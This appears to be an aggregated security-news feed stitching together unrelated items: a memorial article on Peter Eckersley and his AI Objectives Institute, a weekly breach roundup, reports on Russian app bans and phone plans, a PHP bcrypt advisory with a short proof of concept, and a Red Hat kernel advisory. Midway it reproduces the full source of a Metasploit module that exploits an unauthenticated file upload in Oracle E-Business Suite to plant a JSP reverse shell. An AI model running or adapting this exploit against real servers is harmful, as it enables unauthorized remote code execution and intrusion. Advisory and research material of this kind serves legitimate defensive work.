Peter Eckersley did groundbreaking work to encrypt the web. After his sudden death, a new organization he founded is carrying out his vision to steer artificial intelligence toward “human flourishing.”

About a week before the privacy and technology luminary Peter Eckersley unexpectedly died last September, he reached out to artificial intelligence entrepreneur Deger Turan. Eckersley wanted to persuade Turan to be the president of Eckersley's brainchild, a new institute that aimed to do nothing less ambitious than course-correct AI's evolution to safeguard the future of humanity.

Eckersley explained he couldn't run this project himself: He was having serious health issues due to colon cancer, and the organization's co-founder, Brittney Gallagher, was very pregnant and about to go on maternity leave. But Turan wouldn't be alone, Eckersley assured him—as soon as his illness was resolved, he'd be back to serve as the group's chief scientist. They agreed to meet in San Francisco a few days later to hash out a plan.

By the time Turan's plane landed in San Francisco, Eckersley had died—a tragedy that has sent still-resonating shockwaves through his friends, family, and the tech world. Instead of a meeting with Eckersley to draw up the institute's roadmap, Turan found himself attending his friend's funeral.

In the preceding days, while still fully expecting to recover, Eckersley had already told the board of his nascent organization—the AI Objectives Institute, or AOI—that Turan would be its president. The 44-year-old technologist and activist had also written a rough, incomplete will in Google Docs, in the unlikely event of his death. It began by naming AOI as the inheritor of all his US-based assets. “We started something important,” Eckersley wrote. “I'd want to see whether the people involved could get it a little further.”

Turan had never actually had the chance to tell Eckersley he accepted his request. But as soon as he learned of Eckersley's death, he knew that the role at AOI was not only the most important work he could be doing but also a way to help establish a central pillar of his friend's legacy. “So I said yes,” Turan says. “Let's do this—not a little further, but all the way.”

Peter Eckersley on an evening bike ride in San Francisco in 2021.

Photograph: Laura Helen Winn

Yesterday, hundreds in Eckersley's community of friends and colleagues packed the pews for an unusual sort of memorial service at the church-like sanctuary of the Internet Archive in San Francisco—a symposium with a series of talks devoted not just to remembrances of Eckersley as a person but a tour of his life's work. Facing a shrine to Eckersley at the back of the hall filled with his writings, his beloved road bike, and some samples of his Victorian goth punk wardrobe, Turan, Gallagher, and 10 other speakers gave presentations about Eckersley's long list of contributions: his years pushing Silicon Valley towards better privacy-preserving technologies, his co-founding of a groundbreaking project to encrypt the entire web, and his late-life pivot to improving the safety and ethics of AI.

The event also served as a kind of soft launch for AOI, the organization that will now carry on Eckersley's work after his death. Eckersley envisioned the institute as an incubator and applied laboratory that would work with major AI labs to that take on the problem Eckersley had come to believe was, perhaps, even more important than the privacy and cybersecurity work to which he'd devoted decades of his career: redirecting the future of artificial intelligence away from the forces causing suffering in the world, toward what he described as “human flourishing.”

“We need to make AI not just who we are, but what we aspire to be,” Turan said in his speech at the memorial event, after playing a recording of the phone call in which Eckersley had recruited him. “So it can lift us in that direction.”

The mission Eckersley conceived of for AOI emerged from a growing sense over the last decade that AI has an “alignment problem”: That its evolution is hurtling forward at an ever-accelerating rate, but with simplistic goals that are out of step with those of humanity's health and happiness. Instead of ushering in a paradise of superabundance and creative leisure for all, Eckersley believed that, on its current trajectory, AI is far more likely to amplify all the forces that are already wrecking the world: environmental destruction, exploitation of the poor, and rampant nationalism, to name a few.

AOI's goal, as Turan and Gallagher describe it, is not to try to restrain AI's progress but to steer its _objectives_ away from those single-minded, destructive forces. They argue that's humanity's best hope of preventing, for instance, hyperintelligent software that can brainwash humans through advertising or propaganda, corporations with god-like strategies and powers for harvesting every last hydrocarbon from the earth, or automated hacking systems that can penetrate any network in the world to cause global mayhem. “AI failures won't look like nanobots crawling all over us all of the sudden,” Turan says. “These are economic and environmental disasters that will look very recognizable, similar to the things that are happening right now.”

Gallagher, now AOI's executive director, emphasizes that Eckersley's vision for the institute wasn't that of a doomsaying Cassandra, but of a shepherd that could guide AI toward his idealistic dreams for the future. “He was never thinking about how to prevent a dystopia. His eternally optimistic way of thinking was, ‘how do we make the utopia?’” she says. “What can we do to build a better world, and how can artificial intelligence work toward human flourishing?”

To that end, AOI is already working on a handful of example projects to push AI onto that path, now with the help of nine core contributors and a handful of grants including $485,000 from the Survival and Flourishing fund. The pilot project that's furthest along, called “Talk to the City,” is designed to use a ChatGPT-like interface to survey millions of people in a city to both understand their needs and to advocate for them in discussions with policymakers, journalists, and other citizens. Turan describes the experiment as a tool for collective organizing and for governments, enabling a form of democracy more nuanced than simple elections or referendums. He says interested beta testers for the project include everyone from the organizers of Burning Man's Black Rocky City to staffers at the United Nations.

Another prototype, called “Mindful Mirror,” will serve as a kind of personal interactive journal, a chatbot that converses with its user to help them process the events of their daily life. A third, called “Lucid Lens,” will function as a browser plugin that highlights content it detects as being designed to cause outrage or “dopamine loops” that manipulate users in ways they'd rather be aware of or avoid.

Those initial projects might sound modest compared to AOI's lofty futurist goals. But the story of Eckersley's long, renowned career in cybersecurity and privacy was one of building similarly simple-sounding tools that could serve as levers to effect profound changes. Working for the Electronic Frontier Foundation (EFF) for a dozen years, eventually as its chief scientist, Eckersley helped build projects like Privacy Badger, a browser plugin to stop web trackers, and HTTPS Everywhere, another plugin that made your browser navigate to the HTTPS-encrypted version of a website whenever possible. He co-created the SSL Observatory, which scanned the entire internet to determine how much of it was encrypted. Another Eckersley project, a site called Panopticlick, audited a user's browser protection against tracking. And the EFF's Secure Messaging Scorecard rated messaging apps on their privacy and security features, helping usher in a world where billions of WhatsApp users' messages are end-to-end encrypted by default.

“His genius was finding the tiny little hack that would open up a big story,” EFF executive director Cindy Cohen said in her speech at Eckersley's memorial service. “The demonstration that would make manifest what people needed to see about how technology was working.”

Perhaps Eckersley's most celebrated work of all was his cofounding of Let's Encrypt, a free alternative to the certificate authority companies that enable website owners to use HTTPS encryption. By removing a key hurdle to switching on a site's encryption, Let's Encrypt measurably transformed the web: Let's Encrypt has so far issued free certificates to more than 300 million websites. Today, more than 90 percent of the web is encrypted, compared to less than an estimated 40 percent when Let's Encrypt launched in 2015. “We have Peter Eckersley to thank for that,” Let's Encrypt co-founder Alex Halderman said at Eckersley's memorial.

Even as Eckersley was in the midst of launching those influential projects, he was already thinking about an entirely different area of technology where he felt he might make an even bigger long-term impact. By 2013, Eckersley was talking to computer scientists like Anders Sandberg, Stuart Russell, and Nick Bostrom who were focused on “civilizational risk” from AI, says Brian Christian, a scientist and author of the AI-focused books _The Most Human Human_ and _Algorithms to Live By_, and who served as the master of ceremonies for Eckersley's memorial event.

By the time he left the EFF in 2018, Christian says, Eckersley had decided it was time to re-focus his efforts on shaping AI's future. “He saw it has higher stakes, in a way,” says Christian. “He ultimately ended up concluding that the gravity of AI, even in its more hypothetical harms, was so great that it felt urgent, that it was the most important thing to him.” Christian says Eckersley was so persuasive about the magnitude of the problem that he transformed Christian's thinking about AI's future, too. He dedicated his 2020 book on the topic, _The Alignment Problem_, “to Peter, who convinced me.”

Eckersley's sister Nicole, who gave the final speech of the evening, said that she had begun to hear from her brother about his vision for something like AOI in 2020. And even when his health suddenly took a precipitous decline in the late summer of 2022, the institute remained his focus. “Even from his hospital bed, he was charging full speed ahead on AOI. All of his last wishes and instructions were about the survival of this incredibly important project,” she said. “We want to see Peter's plans come to fruition. We want to keep engaged with this incredible community. We want to stop the robots from eating us and crapping out money.”

“So I hope you'll all see this not just as a memorial,” she concluded, “but as the start of an incredible living legacy.”

A Privacy Hero's Final Wish: An Institute to Redirect AI's Future

Plus: The US Marshals disclose a “major” cybersecurity incident, T-Mobile has gotten pwned so much, and more.

Chinese hackers proved themselves to be as prolific and invasive as ever this week with new findings revealing that in February 2022, Beijing-backed hackers compromised the email server of the Association of Southeast Asian Nations, an intergovernmental body of 10 Southeast Asian countries. The security alert, first reported by WIRED, comes as China has escalated its hacking in the region amidst rising tensions.

Meanwhile, with Russia facing economic sanctions over its invasion of Ukraine, the Kremlin has been trying to address gaps in its tech sector. Now, we've learned, it's scrambling to get a home-brewed Android phone off the ground this year. The National Computer Corporation company, a Russian IT giant, says it will somehow produce and sell 100,000 smartphones and tablets by the end of 2023. Though Android is an open-source platform, there are steps Google could take to restrict the license for the new Russian phone that could ultimately force the project to seek a different mobile operating system.

At the Network and Distributed System Security Symposium in San Diego this week, researchers from Ruhr University Bochum and the CISPA Helmholtz Center for Information Security presented findings that popular DJI quadcopters communicate using unencrypted radio signals that can be intercepted to determine where the drones are, as well as the GPS coordinates of their operators. The researchers discovered the exposed communications by reverse engineering DJI's radio protocol, DroneID.

In the US, a long-awaited national cybersecurity plan from the White House finally debuted on Thursday. In focuses in part on familiar priorities like hardening defenses for critical infrastructure and and expanding efforts to disrupt cybercriminal activity. But the plan also includes a proposal to shift legal liability for vulnerabilities and security failures onto the companies who cause them, like software makers or institutions that don't make a reasonable effort to protect sensitive data.

If you want to do something good for your cyber hygiene this weekend, we've got a roundup of the most pressing software patches to download ASAP. Seriously, go install them now, we'll wait here.

And there's more. Each week, we round up the security news we didn’t cover in-depth ourselves. Click the headlines to read the full stories, and stay safe out there.

In December, the password-manager maker LastPass revealed that an August breach it had disclosed at the end of November was worse than the company originally thought, compromising encrypted copies of some users’ password vaults, on top of other personal information. Now, the company has disclosed a second incident that began in mid-August and allowed attackers to rampage through the company's cloud storage and exfiltrate sensitive data. Attackers gained such extraordinary access by targeting a specific LastPass employee with deep system privileges 

“This was accomplished by targeting \[a\] DevOps engineer’s home computer and exploiting a vulnerable third-party media software package, which enabled remote code execution capability and allowed the threat actor to implant keylogger malware,” LastPass wrote in an account of the situation. “The threat actor was able to capture the employee’s master password as it was entered, after the employee authenticated with MFA, and gain access to the DevOps engineer’s LastPass corporate vault.”

To target the LastPass employee, attackers exploited a Plex Media Server software vulnerability that had already been long-patched at the time. The company issued a fix for the bug in May 2020, “roughly 75 versions ago,” Plex said.

US law enforcement officials said on Monday that a stand-alone US Marshals Service network suffered a data exfiltration and ransomware attack in mid-February. “The affected system contains law enforcement sensitive information, including returns from legal process, administrative information, and personally identifiable information pertaining to subjects of USMS investigations, third parties, and certain USMS employees,” Marshals Service spokesperson Drew Wade said in a statement. The impacted data seemingly did not include information from the Witness Security Program or witness protection database. Nonetheless, Wade said that officials had “determined that it constitutes a major incident.”

Three cybercriminal groups that conduct SIM-swapping attacks have claimed that they repeatedly hacked T-Mobile last year as part of their scams. The groups would target T-Mobile employees with phishing attacks to gain access to internal company systems. Then they would sell this access to other cybercriminals to intercept individual T-Mobile customers’ SMS text messages and calls on attacker-controlled devices. The findings come from an analysis by Krebs on Security of Telegram chat activity of the three SIM-swapping gangs.

T-Mobile declined to confirm or deny the claims to Krebs on Security. “We have continued to drive enhancements that further protect against unauthorized access, including enhancing multi-factor authentication controls, hardening environments, limiting access to data, apps or services, and more,” the telecom said in a statement. “We are also focused on gathering threat intelligence data, like what you have shared, to help further strengthen these ongoing efforts.”

A bill filed last week in Texas by Representative Steve Toth would mandate that Texas internet service providers block websites that offer information about receiving abortion care. The bill would also outlaw domain registration and hosting for websites that help Texas residents obtain abortions, either through fundraising, procuring abortifacient drugs, or sharing resources. The proposal lists specific examples of websites that would have to be blocked, including aidaccess.org, heyjane.co, plancpills.org, mychoix.co, justthepill.com, and carafem.org.

The LastPass Hack Somehow Gets Worse

By Deeba Ahmed
Interestingly, Telegram is also part of this ban, although it is owned by Russian millionaire Pavel Durov.
This is a post from HackRead.com Read the original post: Russia Bans WhatsApp, Discord, Telegram, and Others

The Russian government has added a wide range of Western messaging apps to its Register of Prohibited Sites, including Snapchat, WhatsApp, Discord, Skype for Business, Microsoft Teams, and Telegram.

In addition, European encrypted messaging apps Viber and Threema, as well as the Chinese communication app WeChat, have also been banned.

According to a memo posted by a famous online library of hacked materials, such as source codes and malware, the Russian Federation has banned all Western social media and online messaging applications.

The complete list of banned apps includes the following:

1.  Viber
2.  Discord
3.  WeChat
4.  Snapchat
5.  Telegram
6.  Threema
7.  WhatsApp
8.  Microsoft Teams
9.  Skype for Business

The government has devised a new law on Information, Information Technologies, and Information Protection to ban these applications, which was formally implemented yesterday. The law is part of the Federal Service for Supervision of Communications, Information Technology, and Mass Media, aka **Roskomnadzor** (RKN).

Article 8-10 of **the new law** applies to government agencies and organizations and establishes a ban for several Russian organizations on using Western foreign messaging apps.

In a **statement**, Roskomnadzor said, “The law establishes a ban for a number of Russian organizations on the use of foreign messengers (information systems and computer programs owned by foreign persons that are designed and (or) used for exchanging messages exclusively between their users, in which the sender determines the recipients of messages and does not provide for placement by internet users publicly available information on the internet).”

It is worth noting that Zoom and Signal have not been added to the list, but they may be added to the Russian government’s infamous register sometime later. These restrictions are placed on government officials to minimize the possibility of sensitive data landing in the wrong hands, particularly to Ukraine’s allies. Or this could be part of a wider crackdown against foreign tech services in Russia.

Interestingly, Telegram is also part of this block list, even though it is owned by Russian millionaire Pavel Durov. This app is popular in Ukraine and in the western regions, which could be a reason for its blacklisting. App and site owners can file an appeal within a month before they are placed on the Register of Prohibited Sites; however, the appeal may be denied.

In 2018, the Russian administration formally **banned Telegram, 50+ VPNs and anonymizers** in the country and has already blocked hundreds of Western social networking platforms, such as Instagram and Facebook, as well as news platforms. There has also been a crackdown against the use of the Tor browser and VPNs.

*   **Germany bans kids’ smartwatches**
*   **US Military bans TikTok over privacy concerns**
*   **GoDaddy bans neo-nazi DailyStormer website**
*   **Why are Google and Facebook banned in China?**
*   **U.S bans Kaspersky software for links to Russia**

Russia Bans WhatsApp, Discord, Telegram, and Others

Amid isolating sanctions, a Russian tech giant plans to launch new Android phones and tablets. But experts are skeptical the company can pull it off.

The fresh wave of sanctions after the invasion of Ukraine has given new wind to the concept of technological self-sufficiency, with Russia’s government launching multiple initiatives to create domestic substitutes for foreign electronics, online platforms, and software, on which many Russian companies are dependent.

Over a thousand tech companies stopped or curtailed their operations in Russia after the invasion of Ukraine. In just a month, Cisco, SAP, Oracle, IBM, TSMC, Nokia, and Ericsson, as well as Samsung and Apple, left the market, affecting entire industries, including mobile operators, factories, startups, and large state-owned companies. According to IDC, a global market-analysis firm, the Russian IT market in 2022 shrank by $12.1 billion, or 39 percent.

Russian prime minister Mikhail Mishustin said in February that Russia wants to replace 85 percent of foreign software with Russian substitutes, opening dozens of so-called import substitution centers. Among them is a project to create a national operating system for devices. The plan, however, is at an early stage with no road map in sight, says the Internet Research Institute’s Kazaryan.

“Currently, a few big players are trying to woo the government for subsidies to create devices on ‘national mobile OS,’ whatever that might be,” he says.

One of the more promising alternatives to Android is Aurora OS, a Linux-based smartphone operating system made by the Russian state-owned telecommunications firm Rostelecom. But Aurora was primarily made for government use and does not support Android apps. In December, the Russian government refused to allocate any of the 22 billion rubles ($292.1 million) earmarked for the development of the Russian operating system.

Other Russian smartphone makers, such as BQ, have promised to adapt Huawei’s HarmonyOS for its handsets. But there's been no news of progress since BQ’s announcement in September. Huawei, which is based in China, developed its own operating system in 2019 after Google stopped providing its suite of mobile software services to the company because of US trade sanctions. The Chinese IT giant has said it has no plans to launch HarmonyOS-equipped mobile phones outside of China.

Huawei’s struggle to compete outside China shows that it’s hard for a smartphone brand to gain buyers without access to Google services. Huawei lost almost a third of its revenue in 2020, the year after sanctions cut its access to Google Maps, Gmail, and other common Google apps. The biggest hurdle NCC’s new smartphone may face, however, is cheap and readily available phones from China. 

Counterpoint’s data shows that phones from Xiaomi, Realme, and Honor, a budget brand previously owned by Huawei, have replaced once best-selling iPhones and Samsung Galaxy devices, accounting for 95 percent of the market last year.

“There's still a lot of competition,” says Counterpoint’s Stryjak. “I don't think there's a huge gap in the market for a new player.”

Other Russian phones, most famously Yotaphone, have tried to capture the domestic market, but they remained at a very small scale, says Stryjak. Russians prefer brands they already know. Thanks to parallel trading—importing goods without the permission of the manufacturer—even Samsungs and iPhones are still available in the country. NCC says it aims to price its smartphones between 10,000 and 30,000 rubles ($132 and $398). 

“We are considering various options. This could be production at Russian factories or contract manufacturing at Chinese enterprises,” NCC’s Kalinin told local media. NCC did not respond to WIRED’s request for comment.

Other Russian smartphone makers such as Smartekosistema, owned by state giant Rostec, have found that they were unable to procure the necessary chips from TSMC for the second iteration of their handset, the AYYA T2. All of this may make creating Russian challengers to Samsung or Apple very expensive.

“You probably can make a smartphone in Russia with Chinese parts, but it's not very efficient,” says Kazaryan. “And why would anyone buy a Russian phone that is more expensive than Xiaomi?”

The Sketchy Plan to Build a Russian Android Phone

This Metasploit module exploits an unauthenticated arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in order to gain remote code execution as the oracle user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/zip'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload',        'Description' => %q{          This module exploits an unauthenticated arbitrary file upload vulnerability in Oracle Web Applications          Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in          order to gain remote code execution as the oracle user.        },        'Author' => [          'sf', # MSF Exploit & Rapid7 Analysis          'HMs', # Python PoC          'l1k3beef', # Original Discoverer        ],        'References' => [          ['CVE', '2022-21587'],          ['URL', 'https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis'],          ['URL', 'https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/'],          ['URL', 'https://github.com/hieuminhnv/CVE-2022-21587-POC']        ],        'DisclosureDate' => '2022-10-01',        'License' => MSF_LICENSE,        'Platform' => %w[linux],        'Arch' => ARCH_JAVA,        'Privileged' => false, # Code execution as user 'oracle'        'Targets' => [          [            'Oracle EBS on Linux (OVA Install)',            {              'Platform' => 'linux',              'EBSBasePath' => '/u01/install/APPS/fs1/',              'EBSUploadPath' => 'EBSapps/appl/bne/12.0.0/upload/',              'EBSFormsPath' => 'FMW_Home/Oracle_EBS-app1/applications/forms/forms/'            }          ]        ],        'DefaultOptions' => {          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(8000)      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => '/OA_HTML/FrmReportData'    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Unknown unless res.code == 200    match = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})    if match && (match.length == 2)      version = Rex::Version.new(match[1].gsub('_', '.'))      if version.between?(Rex::Version.new('12.2.3'), Rex::Version.new('12.2.11'))        return CheckCode::Appears("Oracle EBS version #{version} detected.")      end      return CheckCode::Safe("Oracle EBS version #{version} detected.")    end    CheckCode::Safe  end  def exploit    endpoints = %w[BneViewerXMLService BneDownloadService BneOfflineLOVService BneUploaderService]    target_url = "/OA_HTML/#{endpoints.sample}"    print_status("Targeting the endpoint: #{target_url}")    jsp_name = Rex::Text.rand_text_alpha_lower(3..8) + '.jsp'    jsp_path = '../' * target['EBSUploadPath'].split('/').length    jsp_path << "#{target['EBSFormsPath']}#{jsp_name}"    jsp_absolute_path = "#{target['EBSBasePath']}#{target['EBSFormsPath']}#{jsp_name}"    zip = Rex::Zip::Archive.new    zip.add_file(jsp_path, payload.encoded)    # The ZIP file is expected to be encoded with the binary to text encoding mechanism called uuencode.    # For a detailed description refer to the Rapid7 AttackerKB analysis in the References section of this module.    uue_data = "begin 777 #{Rex::Text.rand_text_alpha_lower(3..8)}.zip\n"    uue_data << [zip.pack].pack('u')    uue_data << "end\n"    uue_name = "#{Rex::Text.rand_text_alpha_lower(3..8)}.uue"    mime = Rex::MIME::Message.new    mime.add_part(uue_data, 'text/plain', nil, %(form-data; name="file"; filename="#{uue_name}"))    register_file_for_cleanup(jsp_absolute_path)    res = send_request_cgi(      {        'method' => 'POST',        'uri' => target_url,        'vars_get' => { 'bne:uueupload' => 'true' },        'encode_params' => true,        'ctype' => "multipart/form-data; boundary=#{mime.bound}",        'data' => mime.to_s      }    )    unless res && res.code == 200 && res.body.include?('bne:text="Cannot be logged in as GUEST."')      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')    end    print_status('Triggering the payload...')    send_request_cgi(      'method' => 'GET',      'uri' => "/forms/#{jsp_name}"    )  endend

Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload

In PHP 8.0.X before 8.0.28, 8.1.X before 8.1.16 and 8.2.X before 8.2.3, password_verify() function may accept some invalid Blowfish hashes as valid. If such invalid hash ever ends up in the password database, it may lead to an application allowing any password for this entry as valid.

**Summary**

Malformatted BCrypt hashes that include a $ within their salt part will trigger a buffer overread and may erroneously validate any password as valid.

**Details**

Example:

<?php
var\_dump(password\_verify("foo", '$2y$04$00000000$')); // bool(true)
?>

This issue is caused by a PHP specific modification to the crypt\_blowfish implementation that is fittingly named “PHP hack”:

if (tmp == '$') break; /\* PHP hack \*/ \\

The “hack” will allow a salt that is cut short by $ to be detected as valid and allowing it to proceed with the algorithm. At the end the original setting, which is properly NUL terminated, will be copied into the output buffer:

memcpy(output, setting, 7 + 22 - 1);

which is then used to initialize the returned zend_string by leveraging strlen() and thus cutting the string short after the setting:

result = zend\_string\_init(output, strlen(output), 0);

… thus returning the original input.

Furthermore a buffer overread of the setting input may be triggered when copying the setting into the output buffer, because the memcpy uses fixed sizes, even if the setting might be too short:

memcpy(output, setting, 7 + 22 - 1);

**Suggested Fix**

The suggested fix would be removing the “PHP Hack” and thus the differences between PHP's crypt\_blowfish and Openwall’s implementation which is the basis of PHP’s implementation.

The “PHP Hack” exists since the very first version of PHP’s own crypt\_blowfish implementation and no clear reasoning is given for its existence in the commentary or commit history. In any case such a hash is not a valid BCrypt hash and it is not generated by password_hash(), which is the recommended password hashing API in PHP.

While this technically might break backwards compatibility with existing users, the fact that these hashes are never generated by password_hash(), are not accepted by other implementations of BCrypt and introduce possible security vulnerabilities in applications, they should be rejected in every supported PHP version.

**PoC**

Running the following in valgrind:

<?php
var\_dump(password\_verify("foo", '$2y$04$00000000$')); // bool(true)
?>

results in:

    ==423829== Memcheck, a memory error detector
    ==423829== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
    ==423829== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
    ==423829== Command: sapi/cli/php test3.php
    ==423829== 
    ==423829== Invalid read of size 2
    ==423829==    at 0x4840240: memcpy@GLIBC_2.2.5 (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==423829==    by 0x591BE9: BF_crypt (crypt_blowfish.c:763)
    ==423829==    by 0x591DAD: php_crypt_blowfish_rn (crypt_blowfish.c:830)
    ==423829==    by 0x5D76BC: php_crypt (crypt.c:143)
    ==423829==    by 0x68CC98: php_password_bcrypt_verify (password.c:157)
    ==423829==    by 0x68DD3C: zif_password_verify (password.c:635)
    ==423829==    by 0x7A58C1: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:1295)
    ==423829==    by 0x81F2AF: execute_ex (zend_vm_execute.h:55163)
    ==423829==    by 0x824B54: zend_execute (zend_vm_execute.h:59523)
    ==423829==    by 0x769201: zend_execute_scripts (zend.c:1694)
    ==423829==    by 0x6B0B56: php_execute_script (main.c:2545)
    ==423829==    by 0x869719: do_cli (php_cli.c:949)
    ==423829==  Address 0x704da90 is 0 bytes after a block of size 48 alloc'd
    ==423829==    at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==423829==    by 0x7286E6: __zend_malloc (zend_alloc.c:3056)
    ==423829==    by 0x726FFF: _malloc_custom (zend_alloc.c:2418)
    ==423829==    by 0x7271C0: _emalloc (zend_alloc.c:2537)
    ==423829==    by 0x840E4B: zend_string_alloc (zend_string.h:144)
    ==423829==    by 0x840EBE: zend_string_init (zend_string.h:166)
    ==423829==    by 0x841BCB: zend_new_interned_string_request (zend_string.c:245)
    ==423829==    by 0x72B5E9: zval_make_interned_string (zend_compile.c:514)
    ==423829==    by 0x72B664: zend_insert_literal (zend_compile.c:526)
    ==423829==    by 0x72B7EC: zend_add_literal (zend_compile.c:547)
    ==423829==    by 0x72FC82: zend_emit_op (zend_compile.c:2054)
    ==423829==    by 0x73380D: zend_compile_args (zend_compile.c:3516)
    ==423829== 
    ==423829== Invalid read of size 1
    ==423829==    at 0x591BF5: BF_crypt (crypt_blowfish.c:765)
    ==423829==    by 0x591DAD: php_crypt_blowfish_rn (crypt_blowfish.c:830)
    ==423829==    by 0x5D76BC: php_crypt (crypt.c:143)
    ==423829==    by 0x68CC98: php_password_bcrypt_verify (password.c:157)
    ==423829==    by 0x68DD3C: zif_password_verify (password.c:635)
    ==423829==    by 0x7A58C1: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:1295)
    ==423829==    by 0x81F2AF: execute_ex (zend_vm_execute.h:55163)
    ==423829==    by 0x824B54: zend_execute (zend_vm_execute.h:59523)
    ==423829==    by 0x769201: zend_execute_scripts (zend.c:1694)
    ==423829==    by 0x6B0B56: php_execute_script (main.c:2545)
    ==423829==    by 0x869719: do_cli (php_cli.c:949)
    ==423829==    by 0x86A950: main (php_cli.c:1337)
    ==423829==  Address 0x704da94 is 4 bytes after a block of size 48 alloc'd
    ==423829==    at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==423829==    by 0x7286E6: __zend_malloc (zend_alloc.c:3056)
    ==423829==    by 0x726FFF: _malloc_custom (zend_alloc.c:2418)
    ==423829==    by 0x7271C0: _emalloc (zend_alloc.c:2537)
    ==423829==    by 0x840E4B: zend_string_alloc (zend_string.h:144)
    ==423829==    by 0x840EBE: zend_string_init (zend_string.h:166)
    ==423829==    by 0x841BCB: zend_new_interned_string_request (zend_string.c:245)
    ==423829==    by 0x72B5E9: zval_make_interned_string (zend_compile.c:514)
    ==423829==    by 0x72B664: zend_insert_literal (zend_compile.c:526)
    ==423829==    by 0x72B7EC: zend_add_literal (zend_compile.c:547)
    ==423829==    by 0x72FC82: zend_emit_op (zend_compile.c:2054)
    ==423829==    by 0x73380D: zend_compile_args (zend_compile.c:3516)
    ==423829== 
    bool(true)
    ==423829== 
    ==423829== HEAP SUMMARY:
    ==423829==     in use at exit: 1,094 bytes in 20 blocks
    ==423829==   total heap usage: 15,723 allocs, 15,703 frees, 2,766,336 bytes allocated
    ==423829== 
    ==423829== LEAK SUMMARY:
    ==423829==    definitely lost: 0 bytes in 0 blocks
    ==423829==    indirectly lost: 0 bytes in 0 blocks
    ==423829==      possibly lost: 0 bytes in 0 blocks
    ==423829==    still reachable: 1,094 bytes in 20 blocks
    ==423829==         suppressed: 0 bytes in 0 blocks
    ==423829== Rerun with --leak-check=full to see details of leaked memory
    ==423829== 
    ==423829== For lists of detected and suppressed errors, rerun with: -s
    ==423829== ERROR SUMMARY: 3 errors from 2 contexts (suppressed: 0 from 0)
    

**Impact**

Applications that validate passwords with malformed or untrusted hashes might be affected by returning every password as valid for affected hashes.

CVE-2023-0567: BCrypt hashes erroneously validate if the salt is cut short by `$`

Sudo before 1.9.13p2 has a double free in the per-command chroot feature.

CVE-2023-27320: Stable Release

Red Hat Security Advisory 2023-0945-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:0945-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0945  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-4378   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
7.7 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server E4S (v. 7.7) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.src.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.src.rpm

ppc64le:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_68_1-debuginfo-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_70_1-debuginfo-1-1.el7.ppc64le.rpm

x86_64:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_68_1-debuginfo-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_70_1-debuginfo-1-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
